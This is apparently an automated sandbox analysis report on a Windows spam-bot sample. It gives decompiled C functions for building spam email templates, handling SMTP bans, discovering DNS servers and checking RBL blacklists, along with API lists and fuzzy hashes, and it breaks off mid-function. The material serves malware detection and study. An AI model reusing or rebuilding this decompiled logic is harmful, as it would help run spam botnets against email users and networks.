				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}














                                                                                0x0040ad89
                                                                                0x0040ad8a
                                                                                0x0040ad98
                                                                                0x0040ada6
                                                                                0x0040adba
                                                                                0x0040adc6
                                                                                0x0040adcb
                                                                                0x0040add5
                                                                                0x0040adeb
                                                                                0x0040add7
                                                                                0x0040addd
                                                                                0x0040ade6
                                                                                0x0040ade6
                                                                                0x0040adf5
                                                                                0x0040adfe
                                                                                0x0040ae03
                                                                                0x0040ae0f
                                                                                0x0040ae18
                                                                                0x0040ae1b
                                                                                0x0040ae7f
                                                                                0x0040ae81
                                                                                0x0040ae83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ae31
                                                                                0x0040ae3f
                                                                                0x0040ae3f
                                                                                0x0040ae43
                                                                                0x0040ae4f
                                                                                0x0040ae5e
                                                                                0x0040ae6e
                                                                                0x0040ae73
                                                                                0x0040ae7a
                                                                                0x0040ae7a
                                                                                0x0040aea5
                                                                                0x0040aeb6
                                                                                0x0040aedc

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0040AD98
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
                                                                                  • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                  • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                  • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                  • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                  • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
                                                                                  • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
                                                                                • wsprintfA.USER32 ref: 0040AEA5
                                                                                  • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
                                                                                • wsprintfA.USER32 ref: 0040AE4F
                                                                                • wsprintfA.USER32 ref: 0040AE5E
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                • API String ID: 3631595830-1816598006
                                                                                • Opcode ID: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                • Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
                                                                                • Opcode Fuzzy Hash: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                • Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402DF2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 97memorylibrarynetworkCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 55%
                                                                                			E00402DF2(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v28;
				short _v30;
				char _v32;
				struct HINSTANCE__* _t18;
				void* _t22;
				signed int _t23;
				short _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t37;
				CHAR* _t38;
				void* _t40;

				_t38 = "iphlpapi.dll";
				_t18 = GetModuleHandleA(_t38);
				if(_t18 == 0 || _t18 == 0xffffffff) {
					_t18 = LoadLibraryA(_t38);
				}
				if(_t18 == 0 || _t18 == 0xffffffff) {
					L18:
					return 0;
				} else {
					_t35 = GetProcAddress(_t18, "GetNetworkParams");
					if(_t35 == 0) {
						goto L18;
					}
					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
					_t33 =  &_v16;
					_v8 = _t22;
					_v16 = 0x4000;
					_t23 =  *_t35(_t22,  &_v16);
					if(_t23 != 0) {
						goto L18;
					}
					_v12 = _v12 & _t23;
					_t37 = _v8 + 0x10c;
					if(_t37 == 0) {
						L17:
						HeapFree(GetProcessHeap(), 0, _v8);
						return _v12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t40 = _t37 + 4;
						if(_t40 == 0) {
							goto L16;
						}
						_t27 = 2;
						_v32 = _t27;
						__imp__#9(0x35);
						_v30 = _t27;
						__imp__#11(_t40);
						_v28 = _t27;
						if(_t27 == 0 || _t27 == 0xffffffff) {
							__imp__#52(_t40);
							if(_t27 == 0) {
								goto L16;
							}
							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
							_v28 = _t27;
							goto L13;
						} else {
							L13:
							if(_t27 != 0 && _t27 != 0xffffffff) {
								_t31 = E00402CEB(_t33,  &_v32, _a4);
								_pop(_t33);
								_v12 = _t31;
								if(_t31 != 0) {
									goto L17;
								}
							}
						}
						L16:
						_t37 =  *_t37;
					} while (_t37 != 0);
					goto L17;
				}
			}


















                                                                                0x00402dfb
                                                                                0x00402e01
                                                                                0x00402e09
                                                                                0x00402e11
                                                                                0x00402e11
                                                                                0x00402e19
                                                                                0x00402ef1
                                                                                0x00000000
                                                                                0x00402e28
                                                                                0x00402e34
                                                                                0x00402e38
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402e4f
                                                                                0x00402e55
                                                                                0x00402e5a
                                                                                0x00402e5d
                                                                                0x00402e60
                                                                                0x00402e64
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402e6d
                                                                                0x00402e70
                                                                                0x00402e76
                                                                                0x00402ede
                                                                                0x00402ee6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402e78
                                                                                0x00402e78
                                                                                0x00402e78
                                                                                0x00402e7d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402e81
                                                                                0x00402e84
                                                                                0x00402e88
                                                                                0x00402e8f
                                                                                0x00402e93
                                                                                0x00402e99
                                                                                0x00402e9e
                                                                                0x00402ea6
                                                                                0x00402eae
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402eb5
                                                                                0x00402eb7
                                                                                0x00000000
                                                                                0x00402eba
                                                                                0x00402eba
                                                                                0x00402ebc
                                                                                0x00402eca
                                                                                0x00402ed0
                                                                                0x00402ed1
                                                                                0x00402ed6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402ed6
                                                                                0x00402ebc
                                                                                0x00402ed8
                                                                                0x00402ed8
                                                                                0x00402eda
                                                                                0x00000000
                                                                                0x00402e78

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(iphlpapi.dll,74D0EA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
                                                                                • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
                                                                                • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
                                                                                • htons.WS2_32(00000035), ref: 00402E88
                                                                                • inet_addr.WS2_32(?), ref: 00402E93
                                                                                • gethostbyname.WS2_32(?), ref: 00402EA6
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
                                                                                • HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                • String ID: GetNetworkParams$iphlpapi.dll
                                                                                • API String ID: 929413710-2099955842
                                                                                • Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                • Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
                                                                                • Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                • Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208958D Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 284registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?), ref: 020895A7
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 020895D5
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 020895DC
                                                                                • wsprintfA.USER32 ref: 02089635
                                                                                • wsprintfA.USER32 ref: 02089673
                                                                                • wsprintfA.USER32 ref: 020896F4
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 02089758
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 0208978D
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 020897D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 3696105349-2980165447
                                                                                • Opcode ID: 89aa5840b5586853db62f78257fc906492577e08c78806003ca7e8badc55e1ba
                                                                                • Instruction ID: cf705b4b29ca613301a914b21dd331f4687792861186729152480d747dd54c34
                                                                                • Opcode Fuzzy Hash: 89aa5840b5586853db62f78257fc906492577e08c78806003ca7e8badc55e1ba
                                                                                • Instruction Fuzzy Hash: ADA159B190034CEFEB21EFA1CC85FEF3BADAB04341F104026FA55A6251E7B595849FA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040BE31 Relevance: 18.2, APIs: 6, Strings: 6, Instructions: 152stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E0040BE31(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				CHAR* _v12;
				int _v16;
				int _t50;
				int _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				char* _t66;
				CHAR* _t68;
				int _t71;
				int _t72;
				void* _t76;
				intOrPtr _t78;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;
				void* _t91;
				void* _t92;

				_t83 = _a4;
				_t68 = _t83 + 4;
				_v12 = _t68;
				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
					L3:
					_t72 = 0;
					_v16 = 0;
					if(_a8 == 3) {
						L25:
						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
								_t50 = lstrcmpiA(_v12, "smtp_retr");
								_t51 = 0x413638;
								if(_t50 != 0) {
									_t51 = _a4;
								}
							} else {
								_t51 = 0x413634;
							}
						} else {
							_t51 = 0x413630;
						}
						_t86 =  *_t51;
						 *_t51 = _v16;
						if(_t86 == 0) {
							goto L36;
						} else {
							_t52 =  *_t86;
							_t84 = 0;
							while(_t52 != 0) {
								E0040EC2E(_t52);
								_t84 = _t84 + 1;
								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
							}
							return E0040EC2E(_t86);
						}
					}
					_t55 =  *((intOrPtr*)(_t83 + 0x18));
					_t82 = 0;
					if(_t55 <= 0) {
						goto L25;
					} else {
						goto L5;
					}
					do {
						L5:
						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
							_t82 = _t82 + 1;
						}
						_t72 = _t72 + 1;
					} while (_t72 < _t55);
					if(_t82 == 0) {
						goto L25;
					}
					_t70 = 4 + _t82 * 4;
					_t51 = E0040EBCC(4 + _t82 * 4);
					_pop(_t76);
					_v16 = _t51;
					if(_t51 == 0) {
						goto L36;
					}
					E0040EE2A(_t76, _t51, 0, _t70);
					_t57 =  *((intOrPtr*)(_t83 + 0x18));
					_v8 = _v8 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t92 = _t91 + 0xc;
					if(_t57 > 0) {
						_t71 = _v16;
						do {
							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
							if(_t78 == 0xa || _a4 == _t57 - 1) {
								_t88 = _a4 - _v8;
								if(_t78 != 0xa) {
									_t88 = _t88 + 1;
								}
								_t25 = _t88 + 1; // 0x1
								_t59 = E0040EBCC(_t25);
								 *_t71 = _t59;
								if(_t59 == 0) {
									goto L25;
								} else {
									E0040EE08(_t59, _t83 + _v8 + 0x24, _t88);
									_t92 = _t92 + 0xc;
									 *((char*)(_t88 +  *_t71)) = 0;
									if(_t88 > 0) {
										_t31 =  *_t71 - 1; // -1
										_t66 = _t88 + _t31;
										if( *_t66 == 0xd) {
											 *_t66 = 0;
										}
									}
									_t71 = _t71 + 4;
									_v8 = _v8 + _t88 + 1;
									goto L22;
								}
							}
							L22:
							_a4 = _a4 + 1;
							_t57 =  *((intOrPtr*)(_t83 + 0x18));
						} while (_a4 < _t57);
					}
					goto L25;
				} else {
					_t51 = lstrcmpiA(_t68, "smtp_retr");
					if(_t51 != 0) {
						L36:
						return _t51;
					}
					goto L3;
				}
			}

























                                                                                0x0040be40
                                                                                0x0040be43
                                                                                0x0040be4c
                                                                                0x0040be53
                                                                                0x0040be71
                                                                                0x0040be71
                                                                                0x0040be77
                                                                                0x0040be7a
                                                                                0x0040bf62
                                                                                0x0040bf6e
                                                                                0x0040bf83
                                                                                0x0040bf94
                                                                                0x0040bf98
                                                                                0x0040bf9d
                                                                                0x0040bf9f
                                                                                0x0040bf9f
                                                                                0x0040bf85
                                                                                0x0040bf85
                                                                                0x0040bf85
                                                                                0x0040bf70
                                                                                0x0040bf70
                                                                                0x0040bf70
                                                                                0x0040bfa2
                                                                                0x0040bfa7
                                                                                0x0040bfab
                                                                                0x00000000
                                                                                0x0040bfad
                                                                                0x0040bfad
                                                                                0x0040bfaf
                                                                                0x0040bfbe
                                                                                0x0040bfb4
                                                                                0x0040bfb9
                                                                                0x0040bfba
                                                                                0x0040bfbd
                                                                                0x00000000
                                                                                0x0040bfc8
                                                                                0x0040bfab
                                                                                0x0040be80
                                                                                0x0040be83
                                                                                0x0040be87
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040be8d
                                                                                0x0040be8d
                                                                                0x0040be92
                                                                                0x0040be9b
                                                                                0x0040be9b
                                                                                0x0040be9c
                                                                                0x0040be9d
                                                                                0x0040bea3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040bea9
                                                                                0x0040beb1
                                                                                0x0040beb6
                                                                                0x0040beb7
                                                                                0x0040bebc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040bec6
                                                                                0x0040becb
                                                                                0x0040bece
                                                                                0x0040bed2
                                                                                0x0040bed6
                                                                                0x0040bedb
                                                                                0x0040bee1
                                                                                0x0040bee4
                                                                                0x0040bee7
                                                                                0x0040beee
                                                                                0x0040bef9
                                                                                0x0040beff
                                                                                0x0040bf01
                                                                                0x0040bf01
                                                                                0x0040bf02
                                                                                0x0040bf06
                                                                                0x0040bf0c
                                                                                0x0040bf10
                                                                                0x00000000
                                                                                0x0040bf12
                                                                                0x0040bf1c
                                                                                0x0040bf23
                                                                                0x0040bf26
                                                                                0x0040bf2c
                                                                                0x0040bf30
                                                                                0x0040bf30
                                                                                0x0040bf37
                                                                                0x0040bf39
                                                                                0x0040bf39
                                                                                0x0040bf37
                                                                                0x0040bf49
                                                                                0x0040bf4c
                                                                                0x00000000
                                                                                0x0040bf4c
                                                                                0x0040bf10
                                                                                0x0040bf4f
                                                                                0x0040bf4f
                                                                                0x0040bf52
                                                                                0x0040bf55
                                                                                0x0040bf5a
                                                                                0x00000000
                                                                                0x0040be61
                                                                                0x0040be67
                                                                                0x0040be6b
                                                                                0x0040bfcd
                                                                                0x0040bfcd
                                                                                0x0040bfcd
                                                                                0x00000000
                                                                                0x0040be6b

                                                                                APIs
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: 06A$46A$86A$smtp_ban$smtp_herr$smtp_retr
                                                                                • API String ID: 1586166983-142018493
                                                                                • Opcode ID: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                • Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
                                                                                • Opcode Fuzzy Hash: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                • Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B3C5 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v132;
				void* _t46;
				char* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				E00405CE1(_a4, 0x3e800, _a16, 0, 0);
				E0040EF00( &_v132, "%FROM_EMAIL");
				E00405CE1( &_v132, 0x64, _a16, 0, 0);
				_t71 = E0040ED03( &_v132, 0x40);
				_t77 = _t76 + 0x38;
				_t83 = _t71;
				if(_t71 != 0) {
					_t7 = _t71 + 1; // 0x1
					E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
					 *_t71 = 0;
					E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
					_t77 = _t77 + 0x28;
				}
				_t72 = _a12;
				E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
				E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
				_t73 = _a4;
				E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
				_t46 = E0040F0CB( &_v132);
				_push(0);
				_push( &_v132);
				_push(_t46);
				E0040F133();
				E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
				_push(_t73);
				E0040AD89( &_v132, _t83);
				E0040B211(0,  &_v132, 0);
				E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 5);
				E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 0xfffffffb);
				E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
				_t75 = _a8;
				 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
				return _t75;
			}











                                                                                0x0040b3e1
                                                                                0x0040b3ef
                                                                                0x0040b3ff
                                                                                0x0040b40f
                                                                                0x0040b411
                                                                                0x0040b414
                                                                                0x0040b416
                                                                                0x0040b41a
                                                                                0x0040b426
                                                                                0x0040b439
                                                                                0x0040b43b
                                                                                0x0040b440
                                                                                0x0040b440
                                                                                0x0040b443
                                                                                0x0040b453
                                                                                0x0040b467
                                                                                0x0040b47b
                                                                                0x0040b485
                                                                                0x0040b48e
                                                                                0x0040b49a
                                                                                0x0040b49f
                                                                                0x0040b4a3
                                                                                0x0040b4a4
                                                                                0x0040b4a5
                                                                                0x0040b4b6
                                                                                0x0040b4bb
                                                                                0x0040b4bc
                                                                                0x0040b4c7
                                                                                0x0040b4d8
                                                                                0x0040b4e7
                                                                                0x0040b4f8
                                                                                0x0040b504
                                                                                0x0040b515
                                                                                0x0040b51e
                                                                                0x0040b52b
                                                                                0x0040b534

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0040B467
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$wsprintf
                                                                                • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                • API String ID: 1220175532-2340906255
                                                                                • Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                • Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
                                                                                • Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                • Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02081FFD Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 205libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 0208202D
                                                                                • GetSystemInfo.KERNEL32(?), ref: 0208204F
                                                                                • GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 0208206A
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02082071
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 02082082
                                                                                • GetTickCount.KERNEL32 ref: 02082230
                                                                                  • Part of subcall function 02081E46: GetComputerNameA.KERNEL32(?,0000000F), ref: 02081E7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                • String ID: flags_upd$hi_id$localcfg$work_srv
                                                                                • API String ID: 4207808166-1391650218
                                                                                • Opcode ID: cfd6ca314c388c613506591f5712bf4136308cb82e64ba9d4401f64ea173d9f9
                                                                                • Instruction ID: 09a8ca10aab6935decdea4a77bc1ca3f46ebe4069cf4206b77fe23513a152065
                                                                                • Opcode Fuzzy Hash: cfd6ca314c388c613506591f5712bf4136308cb82e64ba9d4401f64ea173d9f9
                                                                                • Instruction Fuzzy Hash: 4151A2B0900344AFE370BF758C85FA7BAECEB55708F00492DFAD682142D7B9A584DB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402011 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 160COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E00402011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x4122f4 & 0x00000001) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000001;
					 *0x4122f0 = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000002) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000002;
					 *0x4122ec = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000004) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000004;
					 *0x4122e8 = E0040F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x4122e0 > 0xdbba0) {
					_t58 =  *0x412000; // 0x410288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x412000;
						do {
							if(E00402684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E00401978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x412000 + _t103 * 4;
						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x4122e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
					_t53 =  *0x412000; // 0x410288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x412000;
						do {
							if(E00402EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E00401978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x412000 + _t102 * 4;
						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x4122dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
				_t45 = E0040F04E(0) -  *0x4122f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x4122e4; // 0x0
				if(_t122 > 0) {
					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x4122e4 = 0x12c;
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
							 *0x4122e4 = 0x4b0;
						}
					}
				}
				_t47 = E0040F04E(0) -  *0x4122f0;
				if(_t47 > 0x4b0) {
